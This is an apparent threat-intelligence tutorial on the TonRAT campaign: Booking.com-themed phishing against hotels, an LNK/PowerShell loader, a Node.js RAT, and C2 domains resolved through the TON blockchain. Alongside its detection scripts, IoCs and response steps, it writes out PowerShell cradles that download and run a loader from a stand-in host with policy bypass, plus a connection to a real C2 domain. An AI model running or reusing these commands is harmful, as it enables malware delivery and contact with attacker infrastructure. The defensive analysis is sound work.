
Introduction
A sophisticated multi-stage malware campaign observed between May and June 2026 has been targeting hotel operating companies with emails impersonating Booking.com. The campaign leverages legitimate services including Calendly and SendGrid to bypass email filters, combined with a PowerShell-based infection chain that delivers a Node.js remote access trojan known as TonRAT. What sets this campaign apart is its use of The Open Network (TON) blockchain API to dynamically obtain command-and-control domains, making traditional domain-based blocking significantly less reliable.
Learning Objectives
- Understand the complete multi-stage infection chain from phishing email to TonRAT execution
- Analyze how attackers abuse legitimate services (Calendly, SendGrid, Node.js official distribution) to evade detection
- Learn detection and mitigation strategies for Node.js-based malware with blockchain-powered C2 infrastructure
You Should Know
1. The Infection Chain: From Booking.com Impersonation to TonRAT Deployment
The attack begins with a convincing phishing email that impersonates Booking.com. The emails are sent through Calendly and SendGrid infrastructure, with the sender display name spoofing Booking.com while the actual sender is a Calendly notification address. The Reply-To field points to suspicious external addresses, providing an additional layer of deception.
Step-by-step infection flow:
1. Phishing Email: Hotel staff receive an email claiming to be related to guest feedback — specifically, complaints about bed bugs found in a hotel room. The email contains a shortened link.
2. Initial Download: Clicking the link downloads a ZIP archive containing an LNK file and a dummy MP4 file. The MP4 file serves only as camouflage.
3. LNK Execution: When the user opens the LNK file, a PowerShell command executes. This command uses `Invoke-WebRequest` to download an additional PowerShell script from a hardcoded malicious domain (photo-26654[.]cfd).
4. Payload Decryption: The downloaded PowerShell script (LE3f0MRT.ps1) contains an AES-encrypted JavaScript file. It decrypts this payload using the following key material:
   – AES Key (base64): `XuvxxbC6FTvygXIM6fkrzax9VMkZizAPEc1pB3GJmA4=`
   – IV (base64): `3sqOzCNaHrLIQxwgJvClww==`
5. Node.js Runtime Download: The PowerShell script downloads the legitimate Node.js runtime from the official Node.js distribution site, https://nodejs.org/dist/v24.13.0/node-v24.13.0-win-x64.zip, and extracts it to `%localappdata%\Nodejs`.
6. TonRAT Execution: The decrypted JavaScript file (TonRAT) is executed using the downloaded `node.exe`. The JavaScript uses Node.js libraries and cannot run with standard Windows script hosts such as `cscript.exe` or `wscript.exe`.
PowerShell command pattern observed in the attack (domain and paths shown as placeholders):
```powershell
# Initial download of the loader
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMP\tonrat.ps1"
# Execution of the loader
powershell -NoProfile -ExecutionPolicy Bypass -File $env:TEMP\tonrat.ps1
# Node.js payload execution (the path contains a space, so it must be invoked with the call operator)
& "C:\Program Files\nodejs\node.exe" C:\Temp\malicious.js
```
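As an added example (not code from the original report or from ITOCHU's analysis), the chain above can be turned into a small endpoint hunt: a Python pass over constructed Sysmon-style process-creation events that flags the PowerShell download cradle, `node.exe` running from a user-writable directory, `node.exe` spawned by PowerShell, and a `.js` argument in a temp path. The event field names, user paths and the benign developer event are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events modelled on the chain above
# (illustrative paths and command lines, not real telemetry).
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -NoProfile -ExecutionPolicy Bypass -Command '
                r'"Invoke-WebRequest -Uri http://photo-26654.cfd/LE3f0MRT.ps1 -OutFile $env:TEMP\LE3f0MRT.ps1"'},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\staff\AppData\Local\Nodejs\node.exe",
     "cmdline": r"C:\Users\staff\AppData\Local\Nodejs\node.exe C:\Users\staff\AppData\Local\Temp\payload.js"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",  # assumed benign developer use
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" C:\dev\app\server.js'},
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp)\\", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.IGNORECASE)


def classify(event):
    """Return the names of the detections that fire on one process-creation event."""
    hits = []
    image, cmd = event["image"].lower(), event["cmdline"]
    if image.endswith("powershell.exe") and DOWNLOAD_CRADLE.search(cmd) and "http" in cmd.lower():
        hits.append("ps_download_cradle")
        if re.search(r"-ExecutionPolicy\s+Bypass", cmd, re.IGNORECASE):
            hits.append("ps_policy_bypass")
    if image.endswith("node.exe"):
        if USER_WRITABLE.search(event["image"]):  # runtime dropped under %localappdata% or %TEMP%
            hits.append("node_from_user_writable_dir")
        if event["parent"].lower().endswith("powershell.exe"):
            hits.append("node_spawned_by_powershell")
        # the decrypted TonRAT payload is a .js file handed to node.exe from a temp/profile path
        if any(a.lower().endswith(".js") and USER_WRITABLE.search(a) for a in cmd.split()[1:]):
            hits.append("node_runs_js_from_temp")
    return hits


def hunt(events):
    """Map event id -> firing detections, keeping only events with at least one hit."""
    results = {}
    for e in events:
        hits = classify(e)
        if hits:
            results[e["id"]] = hits
    return results


if __name__ == "__main__":
    for eid, hits in hunt(EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```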
2. TonRAT’s TON Blockchain C2 Infrastructure
One of the most sophisticated aspects of TonRAT is its use of the TON blockchain API for command-and-control infrastructure discovery.
Step-by-step C2 communication:
1. TON Account ID: TonRAT contains a hardcoded TON account ID that serves as a lookup key.
2. API Query: The malware queries the `tonapi.io` service to resolve its C2 infrastructure. This appears as legitimate API traffic to `https://tonapi.io/v2/blockchain/accounts/{account_id}`.
3. Domain Retrieval: The TON API returns the current C2 domain associated with the account ID. This allows attackers to change C2 domains dynamically without updating the malware.
4. WebSocket Connection: Once the domain is obtained, TonRAT initiates a WebSocket handshake (`wss://`) to the resolved malicious domain. Observed domains include `zloapobikahy23[.]bond`.
5. Persistent C2 Channel: The WebSocket connection establishes a persistent bidirectional channel for command execution and data exfiltration.
Simulation script for testing detection of this behavior:
```powershell
# Step 1: Simulate TON API interaction
Write-Host "[+] Simulating interaction with tonapi.io..."
$api_url = "https://tonapi.io/v2/blockchain/accounts/EQ..."
Invoke-WebRequest -Uri $api_url -Method Get -UseBasicParsing

# Step 2: Simulate WebSocket connection to malicious C2
Write-Host "[+] Simulating WebSocket connection to malicious domain..."
$c2_url = "wss://zloapobikahy23.bond/control"
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$cts = New-Object System.Threading.CancellationTokenSource
$uri = New-Object System.Uri($c2_url)
$task = $ws.ConnectAsync($uri, $cts.Token)
```
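An added example, not part of the original report: a Python correlation over constructed proxy log lines that flags a host whose TON account lookup is followed, within a short window, by a WebSocket connection to a domain outside an allowlist. The log format, host names, time window and allowlist are assumptions; the account ID is a placeholder.

```python
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log lines, "<ISO time> <host> <url>" (illustrative, not real telemetry).
# The TON account id is a placeholder; the .bond domain is the one named in the report.
LOG = """\
2026-06-02T09:14:01 WS-FRONT-07 https://tonapi.io/v2/blockchain/accounts/EQ_PLACEHOLDER_ACCOUNT_ID
2026-06-02T09:14:03 WS-FRONT-07 wss://zloapobikahy23.bond/control
2026-06-02T09:20:15 WS-FRONT-12 https://tonapi.io/v2/blockchain/accounts/EQ_PLACEHOLDER_ACCOUNT_ID
2026-06-02T09:30:00 WS-BACK-03 wss://chat.example-vendor.com/socket
2026-06-02T11:05:00 WS-FRONT-12 wss://some-unknown.example/ws
"""

KNOWN_GOOD_WS = {"chat.example-vendor.com"}  # assumed organisational allowlist of WebSocket endpoints


def parse(log):
    """Parse log lines into (timestamp, host, url) tuples in time order."""
    rows = []
    for line in log.splitlines():
        ts, host, url = line.split(" ", 2)
        rows.append((datetime.fromisoformat(ts), host, url))
    return sorted(rows)


def correlate(log, window_minutes=10, known_good=KNOWN_GOOD_WS):
    """Return (host, ws_domain) pairs where a TON account lookup is followed within
    `window_minutes` by a WebSocket connection to a domain outside the allowlist."""
    window = timedelta(minutes=window_minutes)
    last_lookup = {}  # host -> time of its most recent tonapi.io account query
    findings = []
    for ts, host, url in parse(log):
        u = urlparse(url)
        if u.scheme == "https" and u.hostname == "tonapi.io" \
                and u.path.startswith("/v2/blockchain/accounts/"):
            last_lookup[host] = ts
        elif u.scheme == "wss" and u.hostname not in known_good:
            seen = last_lookup.get(host)
            if seen is not None and ts - seen <= window:
                findings.append((host, u.hostname))
    return findings


if __name__ == "__main__":
    for host, dom in correlate(LOG):
        print(f"{host}: TON account lookup followed by WebSocket to {dom}")
```

A WebSocket to an unknown domain with no preceding TON lookup (WS-BACK-03 with an empty allowlist) is deliberately not raised by this rule; it belongs to the lower-severity "new WebSocket destination" alert rather than the TonRAT-specific correlation.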
3. Abusing Trusted Services: Calendly, SendGrid, and Google Short URLs
The attackers demonstrate advanced tradecraft by leveraging legitimate third-party services throughout the attack chain.
Calendly/SendGrid Abuse:
- Emails are routed through Calendly's notification infrastructure, making them appear legitimate
- Because the mail is sent from SendGrid's trusted infrastructure, it passes SPF, DKIM, and DMARC checks for the actual sending domain, so authentication alone does not flag the message
- The sender display name spoofs Booking.com, but the actual envelope sender is a Calendly address
Google Short URLs:
- The campaign uses Google URL shorteners to obfuscate the true destination
- Shortened links bypass many URL filtering solutions that would otherwise flag suspicious domains
Node.js Official Distribution:
- By downloading `node.exe` from the official `nodejs.org` domain, the malware avoids detection by allowlisting solutions
- The legitimate binary is used to execute malicious JavaScript, making behavioral detection more challenging
Detection commands for identifying this abuse:
```powershell
# Check for unexpected Node.js execution from user-writable locations
Get-Process -Name node -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -like "*\AppData\*" -or $_.Path -like "*\Temp\*" }

# Check for PowerShell downloads from suspicious domains (requires script block logging)
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match "Invoke-WebRequest" -and $_.Message -match "http" }

# Check for Calendly-originated emails in mail logs (Exchange Online)
# <UserMailbox> is a placeholder; -ShowDetails is needed for ClientInfoString to be populated
Search-MailboxAuditLog -Identity <UserMailbox> -Operations SendAs,SendOnBehalf -StartDate (Get-Date).AddDays(-30) -ShowDetails |
    Where-Object { $_.ClientInfoString -match "Calendly" }
```
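As an added example (not from the original report), the Calendly/SendGrid abuse described in this section can be checked at the header level: a Python routine that parses constructed message headers and flags a display name claiming a brand the sending domain is not entitled to, a Reply-To diverted to another domain, and relay through a third-party notification sender. The brand table, the third-party sender list and the sample headers are assumptions.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed message headers modelled on the lure described above (not a real email).
LURE = """\
From: Booking.com <notifications@calendly.com>
Reply-To: guest-feedback@support-desk-mail.example
To: frontdesk@hotel.example
Subject: Guest complaint: bed bugs reported in room 214

Please review the attached feedback.
"""

# Assumed inventory: brands seen in lures with the domains entitled to use them, and
# third-party notification senders whose mail authenticates for *their* domain.
BRANDS = {"booking.com": ("booking.com",)}
THIRD_PARTY_SENDERS = {"calendly.com", "sendgrid.net"}


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyse_headers(raw):
    """Return the list of header-level findings for one message."""
    msg = message_from_string(raw)
    display, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom, reply_dom = _domain(from_addr), _domain(reply_addr)
    findings = []
    # 1. Display name claims a brand that the sending domain is not entitled to use.
    for brand, allowed in BRANDS.items():
        if brand in display.lower() and not any(
                from_dom == a or from_dom.endswith("." + a) for a in allowed):
            findings.append("display_name_impersonation:" + brand)
    # 2. Replies are diverted to a domain different from the sender's.
    if reply_dom and reply_dom != from_dom:
        findings.append("reply_to_mismatch:" + reply_dom)
    # 3. Mail relayed through a third-party notification service: SPF/DKIM pass for
    #    that service, so authentication results alone will not catch the lure.
    if from_dom in THIRD_PARTY_SENDERS:
        findings.append("third_party_sender:" + from_dom)
    return findings


if __name__ == "__main__":
    print(analyse_headers(LURE))
```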
4. Detection and Mitigation Strategies
Security teams should implement the following detection and mitigation measures:
Email Filtering Enhancements:
- Block suspicious Calendly short links and validate sender domains carefully
- Configure alerts for email flows using SendGrid headers from untrusted sources
- Implement strict DMARC policies for your own domains and add display-name impersonation checks, since DMARC validates the sending domain rather than the display name
Endpoint Detection:
- Restrict PowerShell execution to signed scripts only where possible
- Monitor for an unauthorized Node.js runtime (`node.exe`) appearing in unusual locations (e.g., `%localappdata%`, `%TEMP%`)
- Alert on `node.exe` executed with JavaScript files from temporary directories
Network Monitoring:
- Watch for connections to TON API endpoints including `tonapi.io`
- Detect WebSocket traffic (`wss://`) to newly registered or suspicious domains
- Monitor for DNS queries to domains resolved via blockchain APIs
Detection Test Example (simulation that should trigger the alerts above):
```powershell
# TonRAT deployment simulation - triggers detection
$tempDir = "$env:TEMP\tonrat_demo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Download fake loader
$loaderUrl = "http://malicious.example.com/tonrat.ps1"
$loaderPath = "$tempDir\tonrat.ps1"
Invoke-WebRequest -Uri $loaderUrl -OutFile $loaderPath -UseBasicParsing

# 2. Execute the loader
powershell -NoProfile -ExecutionPolicy Bypass -File $loaderPath
```
Windows Registry Persistence Checks:
```powershell
# Check for suspicious Run keys
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue

# Check for scheduled tasks whose action launches node.exe (Actions is a collection, so match its members)
Get-ScheduledTask | Where-Object { $_.Actions.Execute -match "node\.exe" -or $_.Actions.Arguments -match "node\.exe" }
```
5. Incident Response Procedures
If TonRAT infection is suspected, follow this response framework:
Immediate Actions:
- Isolate the affected endpoint immediately to prevent additional C2 traffic and data exfiltration
- Capture memory and disk images for forensic analysis
- Block the identified C2 domains at the network perimeter
Forensic Investigation:
- Review PowerShell operational logs for unauthorized `node.exe` activity
- Perform a forensic sweep for known TonRAT JavaScript hashes
- Investigate any connections to the identified C2 infrastructure
- Check for the presence of `%localappdata%\Nodejs` directory containing `node.exe` and JavaScript payloads
Persistence Removal:
```powershell
# Remove suspicious Node.js installations (PowerShell does not expand %localappdata%, so use $env:LOCALAPPDATA)
Remove-Item -Path "$env:LOCALAPPDATA\Nodejs" -Recurse -Force -ErrorAction SilentlyContinue
# Clear suspicious Run keys
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "NodeUpdate" -ErrorAction SilentlyContinue
# Delete malicious scheduled tasks
Unregister-ScheduledTask -TaskName "tonrat" -Confirm:$false
```
6. Indicators of Compromise (IoC)
File Hashes:
- ZIP archive hashes (refer to ITOCHU’s Appendix for complete list)
- LNK file hashes
- PowerShell script hashes (LE3f0MRT.ps1)
- TonRAT JavaScript payload hashes
Network Indicators:
- `photo-26654[.]cfd` — PowerShell download domain
- `zloapobikahy23[.]bond` — WebSocket C2 domain
- `tonapi.io` — TON blockchain API (legitimate but abused)
- `nodejs.org/dist/v24.13.0/` — legitimate Node.js download (abused)
File Paths:
- `%localappdata%\Nodejs\` — Node.js runtime installation
- `%localappdata%\Nodejs\node.exe` — executed Node.js binary
- `%TEMP%\*.js` — decrypted TonRAT payloads
What Undercode Say
- Key Takeaway 1: The TonRAT campaign represents a significant evolution in malware tradecraft, combining legitimate service abuse (Calendly, SendGrid, Node.js official distribution) with blockchain-based C2 infrastructure that makes takedown efforts substantially more difficult.
- Key Takeaway 2: Traditional domain-based blocking and signature-based detection are insufficient against this threat. Organizations must implement behavioral detection for unauthorized Node.js execution, monitor TON API traffic, and develop threat hunting capabilities for WebSocket-based C2 channels.
Analysis
The TonRAT campaign demonstrates how attackers are increasingly adopting techniques that blur the line between legitimate and malicious activity. By downloading Node.js from the official distribution site and using the TON blockchain API for C2 domain resolution, the malware operates with a high degree of legitimacy that evades many security controls. The abuse of Calendly and SendGrid infrastructure highlights the growing challenge of email security — even well-configured email filters can be bypassed when attackers leverage trusted third-party senders.
The multi-stage infection chain, while complex, shows careful engineering: each stage is designed to be as innocuous as possible. The LNK file with embedded PowerShell, the use of AES encryption for the JavaScript payload, and the legitimate Node.js runtime all contribute to evasion. The WebSocket-based C2 communication over `wss://` provides encrypted, bidirectional communication that blends with normal HTTPS traffic.
This campaign underscores the importance of defense-in-depth strategies that go beyond perimeter security. Endpoint detection and response (EDR) solutions must be configured to detect unusual process behaviors — such as `node.exe` running from non-standard locations — rather than relying solely on known malware signatures. Security teams should also develop threat hunting queries specifically for WebSocket connections to newly registered domains and for PowerShell scripts that download and execute Node.js binaries.
Prediction
- The adoption of blockchain technology for C2 infrastructure will accelerate as more threat actors recognize the resilience and takedown resistance it provides. Expect to see similar techniques using Ethereum, Solana, and other blockchain networks for command-and-control in 2026-2027.
- The use of legitimate services like Calendly and SendGrid for phishing will force email security vendors to develop more sophisticated behavioral analysis capabilities, but this will create a cat-and-mouse game where attackers continuously shift to newly trusted services.
- Small and medium-sized hospitality organizations, which often lack dedicated security teams, remain highly vulnerable to these sophisticated campaigns. Expect increased targeting of the hospitality sector as attackers refine their social engineering lures around guest feedback and booking workflows.
- The security community will develop new detection frameworks specifically for Node.js-based malware, incorporating YARA rules for JavaScript obfuscation patterns and behavioral analytics for unexpected Node.js process executions.
- As defenders improve detection, attackers will likely add additional evasion layers — potentially including fileless execution, reflective loading of Node.js, or integration with legitimate cloud services for C2 traffic masking.
- Collaboration between threat intelligence sharing platforms and blockchain analytics firms will improve, enabling faster identification and blocking of TON-based C2 domains through partnerships with blockchain explorers and API providers.
- The sophistication of this campaign suggests a well-resourced threat actor with significant development capabilities. Similar attacks targeting other industries with business-to-consumer communication workflows (e.g., airlines, travel agencies, e-commerce) are likely to emerge.
- Organizations that implement comprehensive PowerShell logging, application whitelisting for Node.js, and network monitoring for WebSocket traffic will be better positioned to detect and respond to these threats before significant data exfiltration occurs.
- The use of the legitimate Node.js runtime from official sources means traditional application control solutions that allowlist `node.exe` based on publisher certificates will not block execution, forcing a shift toward behavioral allowlisting approaches.
- The cybersecurity industry will develop specialized training courses focusing on blockchain-based threat intelligence and Node.js malware analysis, equipping analysts with the skills needed to combat evolving threats like TonRAT.
Reported By: Flavioqueiroz Tonrat – Hackers Feeds


